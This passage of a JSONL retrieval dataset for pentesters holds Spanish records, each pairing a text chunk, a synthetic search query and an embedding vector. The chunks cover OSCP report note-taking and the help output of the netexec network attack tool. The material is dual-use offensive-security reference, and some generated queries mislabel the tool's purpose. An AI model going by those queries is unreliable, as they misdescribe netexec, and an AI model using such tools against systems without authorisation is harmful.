-0.09318, 0.00427, -0.02678, 0.04768, -0.03904, 0.08118, -0.01402, -0.10217, 0.00641, -0.12781, -0.06964, 0.02944, -0.05694, 0.04219, 0.01504, -0.01578, 0.00823, 0.06241, 0.09491, 0.05488, 0.0419, -0.05398, -0.01928, -0.1083, 0.00863, -0.00227, 0.01335, 0.01396, 0.07704, 0.04231, 0.01724, -0.05686, 0.01004, 0.00763, 0.05877, -0.08625, -0.07458, -0.09935, 0.1395, -0.04861, -0.06115, -0.08489, -0.10422, -0.0372, -0.07946, 0.04864, 0.01966, 0.04794, -0.00447, 0.07878, -0.07452, 0.11947, 0.13837, 0.04439, -0.00443, -0.06912, -0.0164, -0.02824, 0.1947, -0.00233, -0.01397, 0.05908, -0.02476, 0.04064, 0.01845, -0.06026, 0.0312, -0.05864, 0.1043, -0.07627, -0.13921, -0.00524, -0.05503, 0.04612, 0.00348, -0.06087, 0.04594, 0.05468, 0.03277, 0.01509, -0.01488, 0.04148, 0.10492, 0.11149, -0.01818, -0.00678, 0.02826, 0.05553, 0.02131, -0.02495, 0.05441, 0.0235, -0.0224, -0.07443, -0.08937, -0.05242, 0.03537, 0.02056, -0.05537, 0.05787, 0.0632, 0.02578, -0.02295, -0.08522, 0.05651, 0.11548, 0.05515, -0.05513, -0.02458, -0.02884, 0.03022, -0.01019, -0.09798, -0.01396, 0.02962, -0.02743, -0.03213, -0.01421, -0.01988, 0.03478, -0.07484, 0.03529, -0.01333, 0.00613, -0.02427, -0.03853, 0.03492, -0.00869, -0.05928, 0.03953, -0.0075, -0.00714, -0.03266, 0.02514, -0.04592, 0.03942, 0.07968, -0.02531, 0.02584, 0.00057, -0.00687, 0.04458, 0.04558, -0.04218, -0.0213, 0.0069, 0.02514, 0.01812, -0.0229, 0.02344, -0.06607, -0.00619, 0.01598, 0.04719, -0.01162, -0.0237, 0.0059, -0.00205, -0.01221, 0.0345, -0.04014, -0.09082, 0.10833, 0.07894, 0.01605, 0.00751, 0.00386, 0.00032, -0.09949, -0.03954, 0.01235, 0.00044, -0.00944, -0.04762, -0.0052, -0.00444, 0.0373, 0.03196, 0.02426, 0.03161, -0.01399, -0.02158, 0.00379, 0.08985, 0.00684, -0.03527, 0.01977, -0.02811, -0.00982, -0.02197, -0.00739, 0.01724, -0.0173, 0.01444, 0.02742, 0.03074, 0.01099, -0.00185, -0.06114, -0.03583, -0.03769, -0.0422, 0.07154, 0.00025, -0.05708, 0.01062, 0.03278, 0.0628, -0.0363, -0.05064, 0.0005]} -{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Flujo recomendado\n1. Documenta **antes** de pasar a la siguiente mΓ‘quina (MetodologΓ­a OSCP).\n2. Una carpeta por host con capturas + comandos.\n3. Al acabar, montas el reporte sobre esas notas.\n\nRelacionado: Estructura del examen Β· GestiΓ³n del tiempo Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "cual es una herramienta para estructurar las notas de penetraciΓ³n del examen OSCP?", "v": [-0.06822, -0.00901, -0.04537, -0.27762, 0.09523, -0.1839, -0.05233, 0.01209, -0.03865, 0.04308, -0.11937, 0.03688, -0.08727, -0.03244, 0.00444, 0.05237, 0.06431, -0.07715, -0.0268, 0.09538, -0.14091, -0.01062, -0.09747, 0.11472, -0.04434, 0.08958, -0.09831, 0.01864, -0.06977, 0.00554, -0.03424, 0.05747, 0.07271, -0.08182, -0.09722, -0.00553, -0.02202, -0.03372, -0.0213, 0.18501, -0.05164, 0.07326, -0.01646, 0.13243, 0.16391, -0.0597, 0.02771, 0.17566, -0.00216, -0.07464, 0.00049, -0.04078, -0.1135, -0.02479, -0.05325, -0.1528, 0.15661, -0.06198, 0.12157, -0.08462, -0.02179, 0.04188, -0.07122, -0.12474, 0.03971, -0.06548, -0.04793, -0.03922, -0.06169, 0.07312, 0.01745, 0.07473, -0.03083, -0.07904, -0.02952, -0.02047, 0.00471, -0.00861, 0.12249, -0.00922, 0.04645, -0.01438, -0.11084, 0.10306, -0.09651, -0.08266, 0.09142, -0.03258, -0.03425, -0.00177, 0.01131, 0.04459, -0.01123, 0.05812, 0.03078, -0.08403, 0.02801, -0.04392, -0.00504, -0.04665, 0.11873, 0.04137, -0.08859, 0.05977, -0.09453, 0.04885, -0.06103, 0.03411, 0.0029, -0.04284, 0.05706, 0.05109, -0.07416, -0.03307, -0.0418, -0.01702, 0.02601, 0.00029, -0.04993, -0.1068, 0.04453, 0.07404, -0.09687, -0.01225, -0.04692, -0.01572, 0.02109, 0.05714, 0.04546, -0.01659, 0.03629, -0.03117, -0.0937, 0.05813, -0.01395, -0.12209, -0.03124, -0.13803, -0.00177, -0.06263, 0.0322, 0.08153, -0.00196, -0.06906, 0.00768, 0.05365, -0.0204, -0.03382, -0.06651, 0.00081, -0.06701, -0.02369, -0.0133, 0.05605, -0.01896, -0.00583, -0.03295, 0.03537, -0.03306, 0.06876, -0.05042, -0.05312, 0.01375, 0.02819, 0.01916, -0.0357, -0.06512, -0.01405, 0.03142, -0.02918, 0.0272, -0.00676, 0.01936, 0.00225, 0.011, -0.08684, -0.02832, -0.04235, -0.02921, -0.02909, -0.03249, 0.01421, -0.03922, -0.01126, 0.06279, 0.04284, 0.00531, -0.02859, 0.02354, 0.02575, 0.05596, -0.00026, -0.0601, -0.03278, 0.05609, -0.02163, -0.02649, -0.07926, 0.03882, 0.00447, -0.04655, -0.07049, -0.00112, -0.10123, 0.03217, 0.03435, 0.01315, -0.00859, -0.00348, 0.05381, -0.0029, 0.00405, 0.00405, -0.02438, -0.0212, -0.00482, 0.02763, 0.12955, -0.03965, -0.01685, 0.02693, 0.02265, 0.08349, 0.01473, -0.07761, 0.01788, -0.03494, 0.00628, 0.04246, -0.0086, 0.0432, -0.02509, 0.01335, -0.02776, 0.08364, -0.02647, -0.01654, 0.00276, -0.0444, -0.04533, 0.03327, 0.05503, -0.01153, -0.03963, -0.06014, -0.00697, 0.00792, -0.05078, -0.04068, -0.10473, 0.00395, 0.00238, 0.05731, -0.09106, 0.02421, -0.00328]} -{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# netexec β€” manual\n\nSalida de `netexec --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nusage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT]\n [--jitter INTERVAL] [--no-progress] [--log LOG]\n [--verbose | --debug] [-6] [--dns-server DNS_SERVER]\n [--dns-tcp] [--dns-timeout DNS_TIMEOUT]\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp} ...\n\n . .\n .| |. _ _ _ _____\n || || | \\ | | ___ | |_ | ____| __ __ ___ ___\n \\\\( )// | \\| | / _ \\ | __| | _| \\ \\/ / / _ \\ / __|\n .=[ ]=. | |\\ | | __/ | |_ | |___ > < | __/ | (__\n / /Λ™-Λ™\\ \\ |_| \\_| \\___| \\__| |_____| /_/\\_\\ \\___| \\___|\n Λ™ \\ / Λ™\n Λ™ Λ™\n\n The network execution tool\n Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx\n\n For documentation and usage examples, visit: https://www.netexec.wiki/\n\n Version : 1.5.1\n Codename: Yippie-Ki-Yay\n Commit : 515dccee", "indexar": "que programa sirve para ejecutar comandos en varios servidores a la vez desde una sola consola?", "v": [0.04892, 0.02236, -0.19929, -0.09344, -0.02982, -0.21886, 0.11108, -0.17089, -0.00648, -0.10874, -0.16133, 0.00974, 0.10878, -0.14597, 0.0503, 0.01735, 0.18458, -0.07266, 0.0367, 0.09781, 0.07229, -0.01088, 0.10615, -0.04547, -0.00963, 0.08325, 0.14061, -0.02624, -0.03203, -0.04854, -0.05389, -0.07732, 0.10808, -0.11058, 0.03282, 0.00426, -0.10913, 0.02445, -0.03763, 0.08083, 0.02314, 0.06109, -0.10952, -0.03897, 0.03602, -0.04063, 0.1094, -0.00383, 0.07686, -0.05355, -0.03308, -0.02144, -0.01406, 0.00201, -0.01392, -0.07358, 0.0291, -0.09266, -0.00086, 0.03787, -0.08189, -0.05054, 0.08313, 0.03274, 0.06751, 0.04168, -0.0409, -0.14762, -0.04649, 0.02115, -0.17336, 0.03354, -0.0405, -0.02862, -0.00156, -0.02369, -0.0955, -0.09001, 0.10251, -0.00417, -0.0071, -0.05761, -0.10196, 0.05852, -0.07727, -0.07428, -0.02446, -0.03776, -0.01876, -0.04982, 0.03681, 0.01347, -0.00747, 0.10297, 0.10383, 0.02242, 0.16536, -0.01744, 0.0605, 0.01629, 0.09769, -0.0299, -0.07844, 0.10651, -0.06508, 0.09361, 0.07014, -0.04376, 0.05479, 0.01716, 0.01148, -0.04778, -0.00583, -0.01374, -0.08897, -0.04631, -0.03902, -0.05952, 0.07823, 0.00184, -0.12214, 0.03793, 0.03453, 0.04116, 0.04382, -0.03708, -0.03888, -5e-05, 0.03135, 0.03224, -0.02, -0.03643, 0.05526, 0.0022, -0.07357, 0.04852, 0.05931, -0.03898, -0.07538, -0.1146, 0.08681, 0.10743, 0.03122, -0.01528, 0.08798, 0.00065, 0.09586, -0.05014, -0.03812, -0.01795, 0.06422, 0.0018, -0.0531, 0.02534, -0.05887, -0.01787, 0.00751, 0.02686, -0.11073, 0.06763, -0.03632, -0.00894, -0.08625, 0.03725, 0.07623, -0.04004, -0.06942, 0.03483, 0.04664, 0.06752, -0.04415, 0.0447, 0.0308, -0.05118, -0.00311, -0.03494, -0.06916, -0.00463, 0.06838, 0.01044, -0.03465, 0.06111, -0.02433, -0.00931, -0.07143, -0.06292, -0.05605, -0.01158, -0.00546, -0.0251, 0.01448, 0.04058, -0.0573, -0.01006, 0.02898, -0.00199, -0.03667, -0.01447, -0.05396, -0.06191, -0.01543, 0.02791, -0.00167, -0.04553, 0.0261, 0.0366, -0.03796, 0.04242, -0.00189, 0.06276, 0.00281, 0.03151, 0.08222, 0.04478, -0.00477, -0.06989, 0.04576, 0.00409, 0.01019, 0.01286, 0.00147, 0.00288, 0.05835, -0.02601, -0.01126, -0.02, 0.01599, -0.00462, 0.03299, -0.00995, -0.00258, 0.00363, 0.01941, -0.03277, -0.00227, -0.00888, 0.02418, -0.02519, -0.01657, -0.07172, -0.02761, 0.05695, -0.01387, -0.09689, -0.01236, -0.10833, -0.0751, -0.01798, -0.01881, -0.01782, -0.01559, 0.02685, 0.02299, -0.0287, -0.04907, -0.01529]} -{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# netexec β€” manual\n\nSalida de `netexec --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nusage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT]\n [--jitter INTERVAL] [--no-progress] [--log LOG]\n [--verbose | --debug] [-6] [--dns-server DNS_SERVER]\n [--dns-tcp] [--dns-timeout DNS_TIMEOUT]\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp} ...\n\n . .\n .| |. _ _ _ _____\n || || | \\ | | ___ | |_ | ____| __ __ ___ ___\n \\\\( )// | \\| | / _ \\ | __| | _| \\ \\/ / / _ \\ / __|\n .=[ ]=. | |\\ | | __/ | |_ | |___ > < | __/ | (__\n / /Λ™-Λ™\\ \\ |_| \\_| \\___| \\__| |_____| /_/\\_\\ \\___| \\___|\n Λ™ \\ / Λ™\n Λ™ Λ™\n\n The network execution tool\n Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx\n\n For documentation and usage examples, visit: https://www.netexec.wiki/\n\n Version : 1.5.1\n Codename: Yippie-Ki-Yay\n Commit : 515dccee", "indexar": "con que herramienta puedo probar mΓΊltiples servicios de red como SMB, SSH o FTP de forma rΓ‘pida?", "v": [0.04322, -0.01751, -0.23913, -0.16171, -0.04444, -0.06391, -0.0786, -0.1458, -0.01693, 0.05854, -0.1315, 0.11489, 0.17279, -0.20248, 0.0564, 0.10979, -0.04451, -0.22776, -0.0055, -0.03421, 0.08792, -0.07179, -0.12034, -0.06729, -0.0291, 0.00937, 0.11919, 0.02485, -0.0764, 0.02096, 0.12293, -0.0205, 0.0287, -0.02737, -0.0724, 0.00297, 0.00288, 0.04591, 0.01424, -0.01762, 0.03689, 0.02049, -0.06108, 0.0339, 0.02487, 0.03741, -0.09836, 0.00063, 0.01275, 0.08833, 0.04024, -0.15704, -0.18181, -0.03348, -0.13301, -0.10852, 0.13595, -0.19537, -0.08724, 0.02141, -0.04082, 0.02706, -0.03043, -0.02325, 0.02693, -0.08357, -0.01598, -0.011, -0.10466, 0.06052, -0.03323, 0.0352, -0.0358, 0.00652, -0.0483, 0.05614, -0.02961, 0.03337, 0.07542, -0.02195, -0.01141, -0.02458, -0.07885, 0.00141, -0.11895, -0.13722, -0.00527, -0.04416, -0.0128, -0.07487, 0.01982, 0.06099, 0.01376, 0.07914, 0.01004, 0.00776, 0.05066, -0.02159, 0.04941, -0.03889, 0.08143, 0.04894, -0.11841, 0.09654, -0.02988, -0.01709, 0.04522, 0.00777, 0.034, 0.00767, 0.08574, 0.02142, 0.06666, -0.02558, -0.05807, -0.06947, -0.08237, -0.09718, -0.04907, -0.01699, -0.00908, -0.04597, -0.07296, -0.00894, 0.00256, -0.04085, -0.01915, -0.00375, 0.00498, 0.00788, 0.03678, -0.00355, -0.0602, -0.0504, 0.01124, 0.01026, 0.02337, -0.10596, 0.02153, -0.09101, 0.01062, 0.0125, -0.03651, -0.07089, 0.04253, -0.01486, 0.00243, -0.08113, -0.0593, 0.03651, 0.02649, -0.0323, -0.01816, -0.02262, -0.0426, 0.00625, 0.02299, -0.03478, -0.06126, 0.11125, -0.09292, -0.00316, 0.08341, 0.06794, -0.00488, 0.00256, 0.04809, -0.01968, 0.05273, -0.01496, -0.007, 0.0709, -0.00638, -0.08022, -0.01216, -0.07504, -0.06215, -0.01818, 0.01667, -0.08999, 0.02703, 0.00149, -0.05556, 0.00055, -0.02412, -0.08068, -0.01401, -0.01034, 0.02142, -0.03753, 0.00591, 0.04722, -0.00043, -0.01458, 0.01715, 0.01161, -0.01659, -0.02368, -0.02761, -0.07855, -0.11171, -0.01232, -0.08856, -0.06125, 0.0194, 0.02484, -0.01358, 0.11289, -0.01815, 0.01152, 0.06025, -0.00854, 0.08919, -0.07246, -0.00221, -0.03367, 0.01794, -0.03088, 0.0439, -0.01493, 0.00438, 0.0134, 0.03665, 0.02653, -0.04967, -0.0579, 0.01351, 0.02925, 0.01547, -0.01201, 0.0501, 0.00225, 0.01291, -0.03192, 0.05195, -0.02495, 0.04569, -0.02654, -0.03096, -0.01402, -0.01478, -0.00416, -0.05073, 0.02352, -0.00023, -0.03985, -0.07031, -0.02781, -0.00488, -0.05075, -0.02076, 0.03848, 0.02845, -0.05162, -0.01684, 0.00944]} -{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# netexec β€” manual\n\nSalida de `netexec --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nusage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT]\n [--jitter INTERVAL] [--no-progress] [--log LOG]\n [--verbose | --debug] [-6] [--dns-server DNS_SERVER]\n [--dns-tcp] [--dns-timeout DNS_TIMEOUT]\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp} ...\n\n . .\n .| |. _ _ _ _____\n || || | \\ | | ___ | |_ | ____| __ __ ___ ___\n \\\\( )// | \\| | / _ \\ | __| | _| \\ \\/ / / _ \\ / __|\n .=[ ]=. | |\\ | | __/ | |_ | |___ > < | __/ | (__\n / /Λ™-Λ™\\ \\ |_| \\_| \\___| \\__| |_____| /_/\\_\\ \\___| \\___|\n Λ™ \\ / Λ™\n Λ™ Λ™\n\n The network execution tool\n Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx\n\n For documentation and usage examples, visit: https://www.netexec.wiki/\n\n Version : 1.5.1\n Codename: Yippie-Ki-Yay\n Commit : 515dccee", "indexar": "existe alguna alternativa libre a los scripts antiguos de enumeraciΓ³n de redes para automatizar pruebas?", "v": [-0.04219, 0.04586, -0.1815, -0.16543, -0.03791, -0.03073, -0.15282, -0.06721, -0.10756, -0.11302, -0.06002, -0.18377, 0.00265, 0.00305, 0.21286, -0.04, 0.01394, -0.06763, 0.16708, -0.02425, -0.0401, -0.02123, -0.09116, -0.06868, -0.07617, -0.04399, -0.0403, 0.05123, -0.17084, 0.03885, -0.07232, 0.08691, 0.073, -0.0221, -0.06859, 0.03337, 0.17581, 0.08011, 0.0984, 0.10579, 0.10054, 3e-05, -0.05492, 0.04206, 0.02085, 0.03567, -0.12035, 0.02492, -0.02915, -0.05574, -0.00725, -0.11141, -0.08888, -0.05161, -0.03257, -0.05942, 0.11984, -0.11805, -0.05028, 0.01469, 0.03717, -0.06829, 0.04843, -0.00538, 0.07416, 0.10392, 0.05648, -0.0196, -0.04851, 0.16619, 0.08283, 0.06274, -0.02455, -0.0059, -0.04788, 0.05228, -0.09324, -0.05068, -0.05777, 0.11783, -0.05572, -0.0984, 0.03458, -0.00587, -0.02728, -0.09475, -0.0622, -0.09433, -0.06617, -0.0123, 0.06925, 0.01589, 0.0348, 0.08483, 0.08251, -0.04612, -0.03204, -0.07251, 0.05962, 0.01293, -0.02624, 0.02449, -0.03584, 0.09125, -0.03035, 0.03133, 0.05094, 0.03333, 0.03735, -0.06308, 0.04236, 0.05563, -0.03446, 0.06217, -0.07063, 0.01785, -0.00461, 0.04546, -0.00796, -0.0023, -0.00438, 0.00247, -0.09805, -0.04113, 0.00236, 0.00734, 0.04008, 0.07341, -0.01322, 0.02251, 0.02942, 0.03839, -0.10094, -0.15491, -0.11014, 0.04072, 0.05679, -0.01489, -0.06434, -0.08811, -0.03367, 0.0511, -0.0336, -0.02454, 0.04736, -0.01715, -0.04195, -0.06544, -0.02441, -0.02276, -0.07073, -0.01835, -0.06729, 0.11403, -0.01192, 0.03364, 0.01491, 0.03413, -0.04953, 0.04041, 0.01735, -0.09943, -0.10084, -0.01447, -0.00936, 0.06365, -0.02852, 0.01547, -0.07039, 0.01983, 0.01096, 0.11943, 0.05359, -0.10172, 0.04828, 0.06421, 0.00263, -0.07762, -0.06987, -0.0262, 0.03192, -0.06322, -0.03263, -0.02543, 0.06108, -0.05584, 0.05893, 0.02712, 0.01784, 0.00933, -0.02903, -0.02158, -0.05828, -0.00393, 0.0905, 0.02596, 0.03868, -0.03099, -0.01307, -0.02494, -0.08971, -0.02424, 0.03159, 0.00099, -0.06602, 0.03896, -0.00324, -0.01928, 0.03463, 0.01103, 0.03871, 0.01848, 0.03915, -0.00068, -0.06203, -0.01637, 0.04215, -0.01393, -0.02298, -0.03958, 0.0216, -0.03515, -0.00747, 0.04189, -0.03081, 0.05485, 0.01592, 0.04426, 0.01782, -0.02901, 0.03292, -0.03128, -0.01406, 0.04125, -0.00911, -0.06491, -0.01633, 0.02011, -0.01269, -0.03984, -0.03512, 0.02712, -0.01444, -0.01499, -0.03092, -0.01712, -0.07245, -0.10323, -0.01669, 0.0194, 0.0021, -0.0132, -0.00061, 0.02736, 0.00216, 0.0164]} -{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n --verbose enable verbose output\n --debug enable debug level information\n\nGeneric Options:\n --version Display nxc version\n -t THREADS, --threads THREADS\n set how many concurrent threads to use\n --timeout TIMEOUT max timeout in seconds of each thread\n --jitter INTERVAL sets a random delay between each authentication\n\nOutput Options:\n --no-progress do not displaying progress bar during scan\n --log LOG export result into a custom file\n\nDNS:\n -6 Enable force IPv6\n --dns-server DNS_SERVER\n Specify DNS server (default: Use hosts file & System DNS)\n --dns-tcp Use TCP instead of UDP for DNS queries\n --dns-timeout DNS_TIMEOUT\n DNS query timeout in seconds", "indexar": "hay alguna herramienta para hacer scans de seguridad con mΓΊltiples hilos?", "v": [0.0849, 0.11456, -0.16419, -0.09363, -0.1055, -0.20839, -0.24118, -0.02565, -0.00202, -0.01741, -0.04403, -0.00963, 0.094, -0.0437, 0.15793, 0.06889, -0.02405, -0.12485, -0.08969, -0.02143, -0.02224, 0.04778, -0.16352, 0.00723, -0.15757, -0.04922, 0.01643, 0.05461, -0.2427, 0.0859, -0.03016, 0.0669, 0.02632, 0.00484, -0.15546, -0.08531, -0.06261, 0.09069, 0.04598, 0.04302, -0.07635, 0.01255, -0.08256, -0.06927, -0.01504, -0.04705, -0.07364, 0.0628, 0.0279, 0.04363, -0.04603, -0.14573, -0.08368, -0.09477, 0.00855, -0.17035, 0.09806, -0.00934, -0.03798, -0.07652, -0.0912, 0.03783, 0.00879, 0.00958, 0.00417, -0.05113, 0.02488, -0.06978, -0.08177, 0.03597, 0.01269, 0.07195, 0.04926, 0.09995, 0.01395, -0.09938, 0.00484, -0.01155, 0.08028, 0.1258, 0.02539, 0.01157, -0.00702, -0.03055, -0.10325, -0.10222, -0.02687, 0.04809, -0.01709, -0.02778, -0.01076, 0.02716, -0.00634, -0.0169, 0.02919, 0.01666, 0.02223, 0.02404, -0.02387, 0.03129, 0.12886, -0.06088, -0.02848, 0.07612, -0.02296, -0.00304, -0.06678, 0.08296, -0.00248, -0.01891, 0.013, 0.05659, -0.01328, 0.01317, -0.11883, 0.01119, -0.05197, -0.06731, 0.04376, -0.02495, 0.05407, 0.02595, -0.03543, -0.00828, 0.05598, -0.04763, -0.05568, 0.08318, 0.01434, -0.05555, -0.01833, -0.06688, -0.1352, -0.03506, -0.05215, 0.01091, 0.00984, -0.1755, -0.04928, -0.08855, 0.03108, 0.03452, -0.02683, -0.06206, 0.04895, 0.00538, -0.01543, -0.024, -0.07252, 0.04282, 0.02959, -0.03076, -0.04841, 0.03, 0.00112, 0.05886, -0.0341, 0.00684, 0.00097, 0.04663, -0.0067, 0.01857, 0.11431, 0.00291, -0.00961, 0.02674, 0.02538, -0.01422, 0.04239, 0.01655, -0.03198, 0.01689, 0.06141, -0.04921, -0.01834, -0.038, -0.0392, -0.01059, 0.01344, -0.12282, 0.00732, 0.00269, 0.00525, -0.03093, 0.08857, -0.13234, 0.03555, 0.0863, 0.01329, -0.00258, -0.00969, 0.02339, -0.05383, 0.02251, -0.00842, 0.0045, 0.02229, -0.08462, 0.00612, -0.00116, -0.03635, 0.07047, 0.01697, -0.08179, 0.04147, 0.0903, -0.00178, -0.02897, 0.02653, 0.0142, 0.08253, -0.02472, 0.04374, -0.03574, -0.02251, -0.00581, -0.00878, 0.01042, -0.02538, 0.01107, 0.03507, -0.01109, 0.02089, 0.01614, -0.0232, 0.01557, 0.02587, 7e-05, 0.03355, 0.01597, 0.0542, -0.0072, -0.06074, 0.00677, 0.02345, -0.02442, 0.03454, -0.016, -0.00466, -0.08304, -0.03863, 0.02017, 0.02306, -0.02406, -0.02306, -0.00225, -0.03709, 0.0295, -0.01829, -0.09008, -0.00323, -0.01361, 0.02441, -0.0448, -0.00364, -0.06247]} -{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n --verbose enable verbose output\n --debug enable debug level information\n\nGeneric Options:\n --version Display nxc version\n -t THREADS, --threads THREADS\n set how many concurrent threads to use\n --timeout TIMEOUT max timeout in seconds of each thread\n --jitter INTERVAL sets a random delay between each authentication\n\nOutput Options:\n --no-progress do not displaying progress bar during scan\n --log LOG export result into a custom file\n\nDNS:\n -6 Enable force IPv6\n --dns-server DNS_SERVER\n Specify DNS server (default: Use hosts file & System DNS)\n --dns-tcp Use TCP instead of UDP for DNS queries\n --dns-timeout DNS_TIMEOUT\n DNS query timeout in seconds", "indexar": "con quΓ© programa puedo realizar peticiones DNS personalizadas o configurar su propio servidor?", "v": [0.05128, 0.1245, -0.11251, -0.19438, 0.05066, -0.04488, 0.05629, -0.11038, -0.13205, -0.01293, 0.02504, -0.00311, -0.02936, -0.29013, -0.0706, -0.0207, 0.16582, -0.05568, 0.13332, 0.13249, -0.0864, -0.0726, -0.04352, -0.01307, -0.05517, -0.04574, 0.09148, -0.05888, -0.09914, 0.01648, 0.02505, -0.0732, -0.0412, 0.01658, -0.00292, -0.02095, -0.04884, 0.09848, 0.00795, -0.01878, 0.06959, -0.00809, -0.05618, 0.08311, 0.05093, -0.02957, 0.06031, -0.08615, 0.05593, -0.18238, -0.02834, -0.06235, -0.09947, -0.03146, 0.02238, 0.01882, 0.17874, -0.23693, 0.05032, -0.05014, -0.09524, -0.05172, 0.09611, -0.02066, 0.12274, -0.02894, -0.01709, -0.01973, -0.04264, -0.0447, -0.0293, -0.02455, 0.01784, -0.10098, 0.15805, 0.06725, 0.03548, -0.04218, 0.113, 0.05022, 0.00183, 0.01138, -0.08984, 0.10168, -0.11155, 0.00829, -0.05092, -0.06597, 0.01043, -0.05841, 0.10739, 0.0762, -0.049, 0.06522, 0.06429, 0.00453, 0.14645, 0.0087, -0.05829, 0.03749, 0.043, 0.07708, -0.05768, 0.07109, -0.02026, 0.06565, 0.07455, -0.07996, 0.09929, 0.02039, 0.01832, 0.03349, -0.07425, -0.02258, -0.01043, -0.03792, -0.07235, -0.0104, 0.06326, 0.03022, -0.09611, -0.03155, -0.00507, 0.01444, 0.0649, -0.00081, 0.01944, 0.05359, -0.02317, 0.00783, 0.00742, -0.01898, -0.05098, -0.09504, -0.08378, 0.03067, -0.00278, -0.06886, 0.00828, -0.09044, 0.00464, 0.00917, 0.01164, -0.01161, 0.09676, -0.02626, 0.04062, -0.0763, -0.05117, 0.05869, 0.02884, -0.01777, 0.01152, 0.00409, -0.11084, -0.0166, 0.02021, -0.08076, -0.03455, 0.10263, -0.01489, 0.00768, 0.01901, 0.02028, 0.04787, 0.01035, -0.04514, 0.03469, 0.07255, 0.08903, -0.06227, 0.03727, -0.0327, -0.06065, 0.01888, -0.01191, -0.01688, -0.06946, 0.05227, 0.01926, -0.04799, 0.00881, 0.06746, -0.00034, -0.04392, -0.05166, -0.01776, 0.02787, 0.04169, -0.00034, 0.03704, 0.06811, -0.07134, 0.03404, 0.00756, -0.01091, -0.05899, -0.07237, -0.03326, 0.00606, -0.01422, -0.03464, 0.02254, -0.05801, -0.00498, 0.03163, -0.05326, 0.04596, 0.0218, 0.04644, -0.0069, -0.04543, 0.05823, -2e-05, -0.02113, 0.01659, 0.02648, -0.02336, 0.01136, -0.01666, -0.02451, 0.03882, 0.05019, -0.00637, 0.01417, -0.01547, 0.03729, 0.01371, 0.02866, 0.04839, -0.01616, -0.00733, -0.05151, -0.04944, 0.03802, 0.0295, 0.03541, -0.01032, -0.00976, -0.02331, -0.00038, 0.06584, -0.02355, -0.01734, 0.01634, -0.05408, -0.03986, 0.01415, 0.00811, -0.0093, -0.02554, 0.01515, 0.03081, -0.04155, 0.01044, -0.00567]} -{"tipo": "pregunta", "herramienta": "netexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/netexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Available Protocols:\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp}\n smb own stuff using SMB\n ftp own stuff using FTP\n ldap own stuff using LDAP\n mssql own stuff using MSSQL\n winrm own stuff using WINRM\n nfs own stuff using NFS\n ssh own stuff using SSH\n wmi own stuff using WMI\n vnc own stuff using VNC\n rdp own stuff using RDP\n```", "indexar": "que programa puedo usar para administrar archivos con SMB", "v": [0.07437, -0.04271, -0.05541, -0.22052, -0.01286, -0.05924, -0.09622, -0.15755, -0.17051, -0.01466, -0.16086, -0.05944, 0.12957, -0.10672, -0.07946, 0.06563, 0.0702, -0.12315, 0.01658, 0.09407, 0.14807, 0.07241, -0.01726, -0.01323, -0.05465, 0.00027, 0.07791, 0.02274, -0.06047, -0.06157, -0.08606, 0.06359, 0.14866, -0.07666, 0.02699, 0.01254, 0.00296, 0.04158, -0.01762, 0.12359, 0.04755, 0.01437, -0.03465, 0.02581, 0.02724, 0.01237, 0.09517, -0.05328, -0.02415, -0.03685, -0.03638, -0.03932, -0.04663, 0.06666, -0.01731, -0.04029, -0.05288, -0.21254, -0.09361, 0.04857, -0.0727, 0.09816, 0.02658, 0.06147, -0.03993, -0.01587, 0.05874, 0.02401, -0.1934, 0.09714, 0.00083, 0.1151, 0.06475, -0.00207, -0.05355, 0.09628, 0.02395, -0.03183, 0.04028, -0.05922, -0.06616, -0.05629, 0.05418, 0.08478, -0.11737, -0.10343, 0.03875, -0.04192, 0.01087, -0.03945, -0.02934, -0.01839, 0.02773, 0.01817, 0.04579, -0.03386, 0.0745, 0.01205, 0.06118, 0.04453, 0.0647, 0.00023, -0.05142, 0.15457, -0.021, 0.08805, 0.10305, -0.00863, -0.00964, -0.00587, 0.05161, 0.0078, -0.03592, 0.05207, -0.12741, 0.05111, -0.0411, -0.06153, 0.00731, -0.09321, -0.03445, 0.04451, 0.00116, -0.01964, 0.13554, -0.0385, 0.074, 0.11468, -0.10667, 0.09995, 0.00948, 0.05152, -0.00548, -0.01944, -0.10903, -0.05321, -0.02649, 0.00495, -0.01383, -0.03515, -0.01231, 0.03254, -0.01086, 0.0448, 